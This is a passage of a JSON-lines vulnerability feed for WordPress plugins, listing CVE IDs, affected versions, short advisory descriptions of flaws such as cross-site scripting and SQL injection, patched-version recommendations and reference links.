version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3c8ba503-db7e-4ac1-898f-a301854db60f?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3c8ba503-db7e-4ac1-898f-a301854db60f?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/barcode-scanner-lite-pos-to-manage-products-inventory-and-orders\\\/trunk\\\/src\\\/Core.php#L621\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/barcode-scanner-lite-pos-to-manage-products-inventory-and-orders\\\/trunk\\\/src\\\/Core.php#L621\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3074826%40barcode-scanner-lite-pos-to-manage-products-inventory-and-orders%2Ftrunk&old=3048878%40barcode-scanner-lite-pos-to-manage-products-inventory-and-orders%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3074826%40barcode-scanner-lite-pos-to-manage-products-inventory-and-orders%2Ftrunk&old=3048878%40barcode-scanner-lite-pos-to-manage-products-inventory-and-orders%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-6025","slug":"order-tip-woo","versionImpact":"1.5.4","versionEndExcluding":"1.5.5","description":"The Order Tip for WooCommerce plugin for WordPress is vulnerable to Unauthenticated Improper Input Validation in all versions up to, and including, 1.5.4. This is due to lack of server-side validation on the `data-tip` attribute, which makes it possible for unauthenticated attackers to apply an excessive or even negative tip amount, resulting in unauthorized discount up to free orders depending on the value submitted.","recommendation":"Update to version 1.5.5, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/order-tip-woo\\\/trunk\\\/assets\\\/build\\\/front.bundle.js\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/order-tip-woo\\\/trunk\\\/assets\\\/build\\\/front.bundle.js\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/order-tip-woo\\\/trunk\\\/frontend\\\/views\\\/tip-form.php#L49\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/order-tip-woo\\\/trunk\\\/frontend\\\/views\\\/tip-form.php#L49\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3318615%40order-tip-woo&new=3318615%40order-tip-woo&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3318615%40order-tip-woo&new=3318615%40order-tip-woo&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9bcd18bd-032e-4a97-83aa-a377f9b1f435?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9bcd18bd-032e-4a97-83aa-a377f9b1f435?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2021-24432","slug":"woocommerce-ajax-filters","versionImpact":"1.5.4.6","versionEndExcluding":"1.5.4.7","description":"The Advanced AJAX Product Filters WordPress plugin does not sanitise the 'term_id' POST parameter before outputting it in the page, leading to reflected Cross-Site Scripting issue.","recommendation":"Update to version 1.5.4.7, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/b92ec5f7-d6a8-476f-a01e-21001a558914\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/b92ec5f7-d6a8-476f-a01e-21001a558914\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2022-4306","slug":"panda-pods-repeater-field","versionEndExcluding":"1.5.4","description":"The Panda Pods Repeater Field WordPress plugin before 1.5.4 does not sanitize and escapes a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against a user having at least Contributor permission.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/18d7f9af-7267-4723-9d6f-05b895c94dbe\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/18d7f9af-7267-4723-9d6f-05b895c94dbe\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-0405","slug":"burst-statistics","versionEndExcluding":"1.5.4","description":"The Burst Statistics \u2013 Privacy-Friendly Analytics for WordPress plugin, version 1.5.3, is vulnerable to Post-Authenticated SQL Injection via multiple JSON parameters in the \/wp-json\/burst\/v1\/data\/compare endpoint. Affected parameters include 'browser', 'device', 'page_id', 'page_url', 'platform', and 'referrer'. This vulnerability arises due to insufficient escaping of user-supplied parameters and the lack of adequate preparation in SQL queries. As a result, authenticated attackers with editor access or higher can append additional SQL queries into existing ones, potentially leading to unauthorized access to sensitive information from the database.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e349f07d-a520-4700-a6e0-25e68c1deeae?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e349f07d-a520-4700-a6e0-25e68c1deeae?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/burst-statistics\\\/trunk\\\/statistics\\\/class-statistics.php?rev=3011996#L380\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/burst-statistics\\\/trunk\\\/statistics\\\/class-statistics.php?rev=3011996#L380\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/burst-statistics\\\/trunk\\\/statistics\\\/class-statistics.php?rev=3011996#L926\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/burst-statistics\\\/trunk\\\/statistics\\\/class-statistics.php?rev=3011996#L926\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3020809%40burst-statistics%2Ftrunk&old=3012004%40burst-statistics%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3020809%40burst-statistics%2Ftrunk&old=3012004%40burst-statistics%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-6268","slug":"json-content-importer","versionImpact":"1.5.3","versionEndExcluding":"1.5.4","description":"The JSON Content Importer WordPress plugin before 1.5.4 does not sanitise and escape the tab parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin","recommendation":"Update to version 1.5.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/15b9ab48-c038-4f2e-b823-1e374baae985\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/15b9ab48-c038-4f2e-b823-1e374baae985\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-3811","slug":"salient-shortcodes","versionImpact":"1.5.3","versionEndExcluding":"1.5.4","description":"The Salient Shortcodes plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'icon' shortcode in all versions up to, and including, 1.5.3 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 1.5.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/70682a2d-16f6-4d7e-bf69-f0f3999f03de?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/70682a2d-16f6-4d7e-bf69-f0f3999f03de?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/themeforest.net\\\/item\\\/salient-responsive-multipurpose-theme\\\/4363266\",\"name\":\"https:\\\/\\\/themeforest.net\\\/item\\\/salient-responsive-multipurpose-theme\\\/4363266\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-8478","slug":"amazonsimpleadmin","versionImpact":"1.5.3","versionEndExcluding":"1.5.4","description":"The The Affiliate Super Assistent plugin for WordPress is vulnerable to arbitrary shortcode execution in all versions up to, and including, 1.5.3. This is due to the software allowing users to supply arbitrary shortcodes in comments when the 'Parse comments' option is enabled. This makes it possible for unauthenticated attackers to execute arbitrary shortcodes.","recommendation":"Update to version 1.5.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7f50769c-77b8-42ff-b67d-b9b289fc51da?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7f50769c-77b8-42ff-b67d-b9b289fc51da?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/amazonsimpleadmin\\\/trunk\\\/AsaCore.php#L285\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/amazonsimpleadmin\\\/trunk\\\/AsaCore.php#L285\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3147740%40amazonsimpleadmin&new=3147740%40amazonsimpleadmin&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3147740%40amazonsimpleadmin&new=3147740%40amazonsimpleadmin&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-5291","slug":"blog-filter","versionImpact":"1.5.3","versionEndExcluding":"1.5.4","description":"The Blog Filter plugin for WordPress is vulnerable to Stored Cross-Site Scripting via 'AWL-BlogFilter' shortcode in versions up to, and including, 1.5.3 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 1.5.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2974261\\\/blog-filter#file54\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2974261\\\/blog-filter#file54\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/blog-filter\\\/tags\\\/1.5.3\\\/blog-filter-output.php#L128\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/blog-filter\\\/tags\\\/1.5.3\\\/blog-filter-output.php#L128\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b95c1bf7-bb05-44d3-a185-7e38e62b7201?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b95c1bf7-bb05-44d3-a185-7e38e62b7201?source=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-3810","slug":"salient-shortcodes","versionImpact":"1.5.3","versionEndExcluding":"1.5.4","description":"The Salient Shortcodes plugin for WordPress is vulnerable to Local File Inclusion in all versions up to, and including, 1.5.3 via the 'icon' shortcode 'image' attribute. This makes it possible for authenticated attackers, with contributor-level and above permissions, to include and execute arbitrary files on the server, allowing the execution of any PHP code in those files. This can be used to bypass access controls, obtain sensitive data, or achieve code execution in cases where php file type can be uploaded and included.","recommendation":"Update to version 1.5.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d1b3d4d5-9d2b-4924-a830-27c07fa1ba98?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d1b3d4d5-9d2b-4924-a830-27c07fa1ba98?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/themeforest.net\\\/item\\\/salient-responsive-multipurpose-theme\\\/4363266\",\"name\":\"https:\\\/\\\/themeforest.net\\\/item\\\/salient-responsive-multipurpose-theme\\\/4363266\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-24651","slug":"wp-migration-duplicator","versionImpact":"1.5.3","versionEndExcluding":"1.5.4","description":"Insertion of Sensitive Information into Log File vulnerability in WebToffee WordPress Backup & Migration allows Retrieve Embedded Sensitive Data. This issue affects WordPress Backup & Migration: from n\/a through 1.5.3.","recommendation":"Update to version 1.5.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/wp-migration-duplicator\\\/vulnerability\\\/wordpress-webtoffee-wp-backup-and-migration-plugin-1-5-3-sensitive-data-exposure-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/wp-migration-duplicator\\\/vulnerability\\\/wordpress-webtoffee-wp-backup-and-migration-plugin-1-5-3-sensitive-data-exposure-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10326","slug":"rometheme-for-elementor","versionImpact":"1.5.3","versionEndExcluding":"1.5.4","description":"The RomethemeKit For Elementor plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the save_options and reset_widgets functions in all versions up to, and including, 1.5.3. This makes it possible for authenticated attackers, with Subscriber-level access and above, to modify plugin settings or reset plugin widgets to their default state (all enabled). NOTE: This vulnerability was partially fixed in version 1.5.3.","recommendation":"Update to version 1.5.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3220079\\\/rometheme-for-elementor\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3220079\\\/rometheme-for-elementor\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3231792\\\/rometheme-for-elementor\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3231792\\\/rometheme-for-elementor\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/230b3f2f-44cf-46eb-8e6a-3c52f2ea2fb9?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/230b3f2f-44cf-46eb-8e6a-3c52f2ea2fb9?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-7808","slug":"wp-shopify","versionImpact":"1.5.3","versionEndExcluding":"1.5.4","description":"The WP Shopify WordPress plugin before 1.5.4 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin","recommendation":"Update to version 1.5.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/fa199423-6526-47f6-bab5-9f6dff0f236a\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/fa199423-6526-47f6-bab5-9f6dff0f236a\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-0977","slug":"timeline-widget-addon-for-elementor","versionImpact":"1.5.3","versionEndExcluding":"1.5.4","description":"The Timeline Widget For Elementor (Elementor Timeline, Vertical & Horizontal Timeline) plugin for WordPress is vulnerable to Stored Cross-Site Scripting via image URLs in the plugin's timeline widget in all versions up to, and including, 1.5.3 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page, changes the slideshow type, and then changes it back to an image.","recommendation":"Update to version 1.5.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/03073726-58d0-45b3-b7a6-7d12dbede919?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/03073726-58d0-45b3-b7a6-7d12dbede919?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3029865%40timeline-widget-addon-for-elementor&new=3029865%40timeline-widget-addon-for-elementor&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3029865%40timeline-widget-addon-for-elementor&new=3029865%40timeline-widget-addon-for-elementor&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2022-4836","slug":"breadcrumb","versionEndExcluding":"1.5.33","description":"The Breadcrumb WordPress plugin before 1.5.33 does not validate and escape some of its shortcode attributes before outputting them back in the page, which could allow users with a role as low as contributor to perform Stored Cross-Site Scripting attacks which could be used against high privilege users such as admins.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/e9a228dc-d32e-4918-898d-4d7af4662a14\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/e9a228dc-d32e-4918-898d-4d7af4662a14\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-3583","slug":"simple-facebook-plugin","versionImpact":"1.5.2","versionEndExcluding":"1.5.3","description":"The Simple Like Page Plugin plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's shortcode(s) in all versions up to, and including, 1.5.2 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 1.5.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/070f6820-e70c-4325-b5cb-d2010da34dce?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/070f6820-e70c-4325-b5cb-d2010da34dce?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3092346\\\/simple-facebook-plugin\\\/trunk?contextall=1&old=3051436&old_path=%2Fsimple-facebook-plugin%2Ftrunk\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3092346\\\/simple-facebook-plugin\\\/trunk?contextall=1&old=3051436&old_path=%2Fsimple-facebook-plugin%2Ftrunk\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-4204","slug":"ultimate-woocommerce-auction-pro","versionImpact":"1.5.2","versionEndExcluding":"1.5.3","description":"The Ultimate Auction Pro plugin for WordPress is vulnerable to SQL Injection via the \u2018auction_id\u2019 parameter in all versions up to, and including, 1.5.2 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.  This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","recommendation":"Update to version 1.5.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/auctionplugin.net\\\/changelog\\\/ultimate-woo-auction-pro\\\/\",\"name\":\"https:\\\/\\\/auctionplugin.net\\\/changelog\\\/ultimate-woo-auction-pro\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e492029d-6613-4881-b986-9fe14cb2cf74?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e492029d-6613-4881-b986-9fe14cb2cf74?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-7202","slug":"fatal-error-notify","versionEndExcluding":"1.5.3","description":"The Fatal Error Notify WordPress plugin before 1.5.3 does not have authorisation and CSRF checks in its test_error AJAX action, allowing any authenticated users, such as subscriber to call it and spam the admin email address with error messages. The issue is also exploitable via CSRF","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/d923ba5b-1c20-40ee-ac69-cd0bb65b375a\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/d923ba5b-1c20-40ee-ac69-cd0bb65b375a\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/research.cleantalk.org\\\/cve-2023-7202-fatal-error-notify-error-email-sending-csrf\\\/\",\"name\":\"https:\\\/\\\/research.cleantalk.org\\\/cve-2023-7202-fatal-error-notify-error-email-sending-csrf\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0442","slug":"loan-comparison","versionEndExcluding":"1.5.3","description":"The Loan Comparison WordPress plugin before 1.5.3 does not validate and escape some of its query parameters before outputting them back in a page\/post via an embedded shortcode, which could allow an attacker to inject javascript into into the site via a crafted URL.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/34d95d88-4114-4597-b4db-e9f5ef80d322\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/34d95d88-4114-4597-b4db-e9f5ef80d322\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-49329","slug":"agile-store-locator","versionImpact":"1.5.2","versionEndExcluding":"1.5.3","description":"Unrestricted Upload of File with Dangerous Type vulnerability in Agile Logix Store Locator WordPress allows Upload a Web Shell to a Web Server. This issue affects Store Locator WordPress: from n\/a through 1.5.2.","recommendation":"Update to version 1.5.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/agile-store-locator\\\/vulnerability\\\/wordpress-store-locator-wordpress-1-5-2-arbitrary-file-upload-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/agile-store-locator\\\/vulnerability\\\/wordpress-store-locator-wordpress-1-5-2-arbitrary-file-upload-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0366","slug":"loan-comparison","versionEndExcluding":"1.5.3","description":"The Loan Comparison WordPress plugin before 1.5.3 does not validate and escape some of its shortcode attributes before outputting them back in a page\/post where the shortcode is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/7d68b0df-7169-46b2-b8e3-4d0c2aa8d605\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/7d68b0df-7169-46b2-b8e3-4d0c2aa8d605\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10324","slug":"rometheme-for-elementor","versionImpact":"1.5.2","versionEndExcluding":"1.5.3","description":"The RomethemeKit For Elementor plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 1.5.2 via the register_controls function in widgets\/offcanvas-rometheme.php. This makes it possible for authenticated attackers, with Contributor-level access and above, to extract sensitive private, pending, and draft template data.","recommendation":"Update to version 1.5.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3220079\\\/rometheme-for-elementor\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3220079\\\/rometheme-for-elementor\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/cd726b20-75c9-408e-86fc-061db591a9db?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/cd726b20-75c9-408e-86fc-061db591a9db?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13584","slug":"picture-gallery","versionImpact":"1.5.19","versionEndExcluding":"1.5.20","description":"The Picture Gallery \u2013 Frontend Image Uploads, AJAX Photo List plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'videowhisper_pictures' shortcode in all versions up to, and including, 1.5.19 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 1.5.20, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/picture-gallery\\\/trunk\\\/inc\\\/shortcodes.php#L49\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/picture-gallery\\\/trunk\\\/inc\\\/shortcodes.php#L49\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3218329%40picture-gallery&new=3218329%40picture-gallery&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3218329%40picture-gallery&new=3218329%40picture-gallery&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0f721733-2245-4d8d-9881-91cc0b48551b?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0f721733-2245-4d8d-9881-91cc0b48551b?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-4888","slug":"simple-facebook-plugin","versionImpact":"1.5.1","versionEndExcluding":"1.5.2","description":"The Simple Like Page Plugin plugin for WordPress is vulnerable to Stored Cross-Site Scripting via 'sfp-page-plugin' shortcode in versions up to, and including, 1.5.1 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 1.5.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f81df26f-4390-4626-8539-367a52f8a027?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f81df26f-4390-4626-8539-367a52f8a027?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/simple-facebook-plugin\\\/trunk\\\/views\\\/view-page-plugin.php?rev=2083359#L37\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/simple-facebook-plugin\\\/trunk\\\/views\\\/view-page-plugin.php?rev=2083359#L37\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/simple-facebook-plugin\\\/trunk\\\/views\\\/view-page-plugin.php?rev=2083359#L38\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/simple-facebook-plugin\\\/trunk\\\/views\\\/view-page-plugin.php?rev=2083359#L38\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/simple-facebook-plugin\\\/trunk\\\/views\\\/view-page-plugin.php?rev=2083359#L39\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/simple-facebook-plugin\\\/trunk\\\/views\\\/view-page-plugin.php?rev=2083359#L39\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2988694\\\/simple-facebook-plugin#file17\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2988694\\\/simple-facebook-plugin#file17\",\"refsource\":\"\",\"tags\":[]}]"}
